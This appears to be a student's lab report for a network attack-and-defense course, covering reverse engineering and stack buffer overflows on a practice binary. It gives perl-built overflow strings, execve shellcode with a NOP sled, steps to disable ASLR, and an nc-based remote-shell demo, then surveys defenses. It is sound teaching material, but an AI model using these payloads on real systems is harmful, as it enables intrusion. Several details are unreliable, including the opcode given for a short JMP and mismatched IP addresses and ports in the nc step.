20201315《网络对抗技术》Exp1

目录

• 1 逆向及Bof基础实践说明
  • 1.1 NOP, JNE, JE, JMP, CMP汇编指令的机器码
• 2 直接修改程序机器指令，改变程序执行流程
• 3 通过构造输入参数，造成BOF攻击，改变程序执行流
  • 3.1 反汇编，了解程序的基本功能
  • 3.2 确认输入字符串哪几个字符会覆盖到返回地址、用什么值来覆盖返回地址
    • 3.2.1分析覆盖返回地址的字符
  • 3.3 构造输入字符串
  • 3.4攻击成功
• 4. 注入Shellcode并执行
  • 4.1 准备一段Shellcode
  • 4.2 准备工作
  • 4.3 构造要注入的payload
  • 4.4 结合nc模拟远程攻击
• 5 Bof攻击防御技术
  • 5.1. 从防止注入的角度
  • 5.2. 注入了也不让运行
  • 5.3. 增加shellcode的构造难度
  • 5.4 从管理的角度
• 6 实践总结
  • 6.1遇到的问题
  • 6.2实验体会

1 逆向及Bof基础实践说明

1.1 NOP, JNE, JE, JMP, CMP汇编指令的机器码

• NOP：机器码为0x90。NOP指令即“空指令”，执行到NOP指令时，CPU什么也不做，完毕之后继续执行NOP后面的一条指令。

• JNE：机器码为0x75。JNE是条件转移指令，如果不相等则跳转。

• JE：机器码为0x74。JE是条件转移指令，如果相等则跳转。

• JMP

  ：无条件跳转指令。JMP主要分为3种：

  • 短跳转：机器码为0xE8。只能跳转到256字节的范围内
  • 近跳转：机器码为0xE9。可跳至同一个段范围内的地址
  • 远跳转：机器码为0xEA。可跳至任意地址，使用48位/32位全指针

• CMP：比较指令，功能相当于减法指令，对操作数之间运算比较，不保存结果。CMP指令也有多种形式，分别代表不同的功能，机器码分别为0x38、0x39、0x3A、0x3B、0x3C、0x3D。

2 直接修改程序机器指令，改变程序执行流程

• 知识要求：Call指令，EIP寄存器,指令跳转的偏移计算，补码，反汇编指令objdump，十六进制编辑工具
• 学习目标：理解可执行文件与机器指令
• 进阶：掌握ELF文件格式，掌握动态技术

下载目标文件pwn1，将文件名改为20201315exp1，将其放入共享文件夹share,然后试运行，并用指令objdump -d 20201315exp1 | more反汇编

一直按回车就会逐行显示更多信息，直到找到可查看到main的内容

此处我们想让它调用getShell，因此要将此处“d7ffffff”修改为 "getShell-80484ba"对应的补码就行

0804847d-80484ba=ffffffc3

于是我们修改可执行文件，将其中的call指令的目标地址由d7ffffff变为c3ffffff：

1. vi进入20201315exp1，在乱码界面按Esc键，然后输入:%!xxd将显示模式切换为16进制模式

2. 输入/e8 d7找到e8d7，修改d7为c3（先按i进入编辑模式再改，改完按Esc键退出）
   
   

3. 输入:%!xxd -r转换16进制为原格式

4. 输入:wq退出

再次反汇编发现已经完成修改

运行发现已经跳转到getshell函数，得到了shell提示符。

3 通过构造输入参数，造成BOF攻击，改变程序执行流

3.1 反汇编，了解程序的基本功能

对pwn1反汇编。该可执行文件正常运行是调用函数foo。foo函数有Buffer overflow漏洞：foo读入字符串，但系统只预留了（28）字节的缓冲区，超出部分会造成溢出，我们的目标是覆盖返回地址

如图输入1111111122222222333333334444444455555555时产生溢出Segmentation fault

3.2 确认输入字符串哪几个字符会覆盖到返回地址、用什么值来覆盖返回地址

3.2.1分析覆盖返回地址的字符

输入为1111111122222222333333334444444455555555时观察寄存器数值发现eip为0x35353535，对应ASCLL表是5555，可以看出本来应返回到foo函数的返回地址已被"5555"覆盖。

通过将55555555换成12345678，再观察eip值找出谁被覆盖，通过查表可知为1234，将1234改为要跳转的地址0804847d所以要输入的是11111111222222223333333344444444\x7d\x84\x04\x08

3.3 构造输入字符串

我们没法通过键盘输入\x7d\x84\x04\x08这样的16进制值，所以先生成包括这样字符串的一个文件。\x0a表示回车，如果没有的话，在程序运行时就需要手工按一下回车键。

Perl是一门解释型语言，不需要预编译，可以在命令行上直接使用。
使用输出重定向>将perl生成的字符串存储到文件input中。可以使用16进制xxd查看指令查看input文件的内容是否如预期。

3.4攻击成功

将input的输入，通过管道符“|”，作为pwn1的输入，发现成功跳转入getshell

4. 注入Shellcode并执行

4.1 准备一段Shellcode

shellcode就是一段机器指令（code）

• 通常这段机器指令的目的是为获取一个交互式的shell（像linux的shell或类似windows下的cmd.exe）
• 所以这段机器指令被称为shellcode。
• 在实际的应用中，凡是用来注入的机器指令段都通称为shellcode，像添加一个用户、运行一条指令。

本实验所使用的shellcode为

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\

4.2 准备工作

输入sudo apt-get install execstack ，安装execstack命令

按教程进行操作：

1. 运行execstack -s 20201315exp1设置堆栈可执行
2. 运行execstack -q 20201315exp1查询文件的堆栈是否可执行
3. 发现randomize_va_space值为2，说明地址随机化是开启的。

关闭地址随机化并查看是否成功关闭

4.3 构造要注入的payload

• 我们采用retaddr+nop+shellcode构造攻击buf

  • nop一为是了填充，二是作为“着陆区/滑行区”。
  • 我们猜的返回地址只要落在任何一个nop上，自然会滑到我们的shellcode。

  ---

打开两个终端，都进入root模式

终端1使用命令

perl -e 'print "A" x 32;print  "\x04\x03\x02\x01\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' >input_shellcode

注入攻击buf

运行之后先不输入回车，在后面的调试过程中需要继续运行的时候再回车

打开终端2，找到20201315exp1的进程号是9967

启动gdb调试这个进程

通过设置断点，来查看注入buf的内存地址

使用break *0x080484ae设置断点，并输入c继续运行。在20201315exp1进程正在运行的终端敲回车，使其继续执行，这就是前面为什么不能以\x0a来结束 input_shellcode的原因。

再返回调试终端，使用info r esp查找地址。使用x/16x 0xffffd4fc查看其存放内容，看到了0x01020304，就是返回地址的位置。根据我们构造的input_shellcode可知，shellcode就在其后，所以地址是 0xffffd500

将0xffffd500放进shellcode

注入后攻击成功

4.4 结合nc模拟远程攻击

我用的是本机上的两个虚拟机，靶机为kali，攻击机为ubuntu。二者互ping可通

靶机ip：192.168.136.129

攻击机ip：192.168.132.1

靶机输入以下命令

nc -lvnp 1315 -e ./20201315exp1

攻击机输入

perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input
(cat input; cat) | nc 192.168.137.142 1324

然后就能获取靶机的shell

靶机端此时显示如下

5 Bof攻击防御技术

5.1. 从防止注入的角度

在编译时，编译器在每次函数调用前后都加入一定的代码，用来设置和检测堆栈上设置的特定数字，以确认是否有bof攻击发生

5.2. 注入了也不让运行

结合CPU的页面管理机制，通过DEP/NX用来将堆栈内存区设置为不可执行。这样即使是注入的shellcode到堆栈上，也执行不了

5.3. 增加shellcode的构造难度

开启地址随机化：shellcode中需要猜测返回地址的位置，需要猜测shellcode注入后的内存位置。这些都极度依赖一个事实：应用的代码段、堆栈段每次都被OS放置到固定的内存地址。ALSR，地址随机化就是让OS每次都用不同的地址加载应用。这样通过预先反汇编或调试得到的那些地址就都不正确了

/proc/sys/kernel/randomize_va_space用于控制Linux下 内存地址随机化机制，其取值有以下三种情况

0 - 表示关闭进程地址空间随机化。
1 - 表示将mmap的基址，stack和vdso页面随机化。
2 - 表示在1的基础上增加栈（heap）的随机化。

当前/proc/sys/kernel/randomize_va_space值为0，我们将其改回2

5.4 从管理的角度

加强编码质量。注意边界检测。使用最新的安全的库函数。

6 实践总结

6.1遇到的问题

execstack安装失败

解决方法：参考链接

Kali Linux E:Unable to locate package 完美解决

第一步：打开sources.list文件

sudo vim /etc/apt/sources.list

第二步：在文件中添加以下内容

deb http://http.kali.org/kali kali-rolling main contrib non-free
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security sana/updates main contrib non-free
deb http://old.kali.org/kali moto main non-free contrib

然后保存退出，再进行更新

sudo apt-get update

最后成功下载

6.2实验体会

这次实验是网络对抗的第一次实验，因为有之前课程和上学期课程设计的基础，关于缓冲区溢出相关知识我是较为熟悉的，这次实验我做起来还是比较轻松的，这让我感受到了提前学习所带来的好处，在接下来的实验中我也会提前学习相关知识，这样我的实验过程才会更加顺利。实验过程中的主要困难和问题还是对kali的不熟悉（之前都是使用ubuntu）造成的。如果没有进一步熟悉kali,我觉得接下来的实验这类问题还会反复出现，因此我也会对此多下些功夫。